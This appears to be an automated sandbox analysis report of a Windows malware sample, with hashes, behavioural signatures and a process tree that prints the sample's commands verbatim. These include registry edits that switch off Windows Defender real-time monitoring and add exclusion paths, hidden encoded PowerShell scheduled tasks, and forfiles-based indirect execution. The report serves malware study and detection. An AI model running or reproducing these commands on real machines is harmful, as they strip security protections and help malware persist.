Analysis

  • max time kernel
    142s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    08/08/2024, 22:46

General

  • Target

    d61184a2cf9f0084c7d79b60f9dfca96f22057768f984a69581259a713e33013.exe

  • Size

    7.2MB

  • MD5

    37b560f46ecc7238684f001a089f1394

  • SHA1

    bcfc02ef0d77610116e9b0497f3786ac5ab90a0f

  • SHA256

    d61184a2cf9f0084c7d79b60f9dfca96f22057768f984a69581259a713e33013

  • SHA512

    8b35d693e3b690808e6649eaf99e7414ee134244242b7113aeededc755e54658e46cd39362915cb643b677e05474d36f69b211e4bea5cf9d237271bc1d72e4d9

  • SSDEEP

    196608:91OD5Fr3enGFq3MBeA8EmwAP+11+AKtSJrbnGkvzCJa:3OD5Fr3qG08BlmwAC1lNrLeJa

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d61184a2cf9f0084c7d79b60f9dfca96f22057768f984a69581259a713e33013.exe
    "C:\Users\Admin\AppData\Local\Temp\d61184a2cf9f0084c7d79b60f9dfca96f22057768f984a69581259a713e33013.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1732
    • C:\Users\Admin\AppData\Local\Temp\7zS3A90.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1092
      • C:\Users\Admin\AppData\Local\Temp\7zS3DDB.tmp\Install.exe
        .\Install.exe /rsZdidT "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2456
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2428
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:2460
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1912
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:2716
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:2744
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2736
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2820
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              PID:2836
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                6⤵
                • System Location Discovery: System Language Discovery
                PID:2840
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2864
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              PID:2880
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                6⤵
                  PID:2756
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:2844
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                5⤵
                • Indirect Command Execution
                • System Location Discovery: System Language Discovery
                PID:2804
                • C:\Windows\SysWOW64\cmd.exe
                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2812
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Drops file in System32 directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2064
                    • C:\Windows\SysWOW64\gpupdate.exe
                      "C:\Windows\system32\gpupdate.exe" /force
                      8⤵
                        PID:832
              • C:\Windows\SysWOW64\forfiles.exe
                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                4⤵
                • Indirect Command Execution
                PID:2080
                • C:\Windows\SysWOW64\cmd.exe
                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2572
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Drops file in System32 directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2948
                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                      7⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2332
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "bJaUjLwxLUDwMvBjjy" /SC once /ST 22:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\aUtBPNtPIEfbItvst\wpiBwfqikhNGWZh\pdXmfHu.exe\" rv /Jdidel 525403 /S" /V1 /F
                4⤵
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:2920
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 556
                4⤵
                • Loads dropped DLL
                • Program crash
                PID:2824
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {979257E4-91E9-45AC-B6A1-C323E9261C31} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
            PID:1600
            • C:\Users\Admin\AppData\Local\Temp\aUtBPNtPIEfbItvst\wpiBwfqikhNGWZh\pdXmfHu.exe
              C:\Users\Admin\AppData\Local\Temp\aUtBPNtPIEfbItvst\wpiBwfqikhNGWZh\pdXmfHu.exe rv /Jdidel 525403 /S
              2⤵
              • Executes dropped EXE
              • Drops file in System32 directory
              • System Location Discovery: System Language Discovery
              • Modifies data under HKEY_USERS
              PID:2344
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                3⤵
                  PID:400
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                    4⤵
                    • Indirect Command Execution
                    • System Location Discovery: System Language Discovery
                    PID:976
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                      5⤵
                        PID:448
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                          6⤵
                            PID:2116
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                        4⤵
                        • Indirect Command Execution
                        • System Location Discovery: System Language Discovery
                        PID:2084
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                          5⤵
                            PID:1616
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                              6⤵
                                PID:2400
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                            4⤵
                            • Indirect Command Execution
                            • System Location Discovery: System Language Discovery
                            PID:2160
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:1736
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                6⤵
                                  PID:2320
                            • C:\Windows\SysWOW64\forfiles.exe
                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                              4⤵
                              • Indirect Command Execution
                              • System Location Discovery: System Language Discovery
                              PID:1936
                              • C:\Windows\SysWOW64\cmd.exe
                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                5⤵
                                  PID:2136
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                    6⤵
                                      PID:1012
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                  4⤵
                                  • Indirect Command Execution
                                  PID:1048
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1740
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:600
                                      • C:\Windows\SysWOW64\gpupdate.exe
                                        "C:\Windows\system32\gpupdate.exe" /force
                                        7⤵
                                          PID:548
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /CREATE /TN "gjSKKNZjo" /SC once /ST 21:01:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                  3⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:1312
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /run /I /tn "gjSKKNZjo"
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1524
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /DELETE /F /TN "gjSKKNZjo"
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:828
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2052
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                    4⤵
                                    • Modifies Windows Defender Real-time Protection settings
                                    • System Location Discovery: System Language Discovery
                                    PID:2424
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1572
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                    4⤵
                                    • Modifies Windows Defender Real-time Protection settings
                                    PID:1568
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /CREATE /TN "gTiXgcpyr" /SC once /ST 16:14:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:2148
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /run /I /tn "gTiXgcpyr"
                                  3⤵
                                    PID:2736
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /DELETE /F /TN "gTiXgcpyr"
                                    3⤵
                                      PID:2224
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                      3⤵
                                      • Indirect Command Execution
                                      PID:3024
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                        4⤵
                                          PID:2080
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                            5⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Drops file in System32 directory
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2892
                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                              6⤵
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3040
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VemQCkOhwRjHyFqD" /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1688
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VemQCkOhwRjHyFqD" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:2976
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VemQCkOhwRjHyFqD" /t REG_DWORD /d 0 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3036
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VemQCkOhwRjHyFqD" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          PID:2396
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VemQCkOhwRjHyFqD" /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                          PID:2228
                                          • C:\Windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VemQCkOhwRjHyFqD" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                              PID:2580
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VemQCkOhwRjHyFqD" /t REG_DWORD /d 0 /reg:64
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1144
                                            • C:\Windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VemQCkOhwRjHyFqD" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2388
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C copy nul "C:\Windows\Temp\VemQCkOhwRjHyFqD\SWwlWNwS\rYxvEzPoWFmicGXQ.wsf"
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2900
                                          • C:\Windows\SysWOW64\wscript.exe
                                            wscript "C:\Windows\Temp\VemQCkOhwRjHyFqD\SWwlWNwS\rYxvEzPoWFmicGXQ.wsf"
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            • Modifies data under HKEY_USERS
                                            PID:1804
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AfQFmMtUU" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:2576
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AfQFmMtUU" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:448
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LSPuJNxSevMsC" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:2088
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LSPuJNxSevMsC" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:2540
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XTIErcVviYlSEsscsXR" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:2528
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XTIErcVviYlSEsscsXR" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:1816
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XuYvvRlLgmUn" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:980
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XuYvvRlLgmUn" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:400
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\enDWjyqEZhNU2" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:1336
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\enDWjyqEZhNU2" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:2464
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\qDoHUGiKOnuwyvVB" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1548
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\qDoHUGiKOnuwyvVB" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:2024
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:936
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:912
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aUtBPNtPIEfbItvst" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:2412
                                            • C:\Windows\SysWOW64\reg.exe
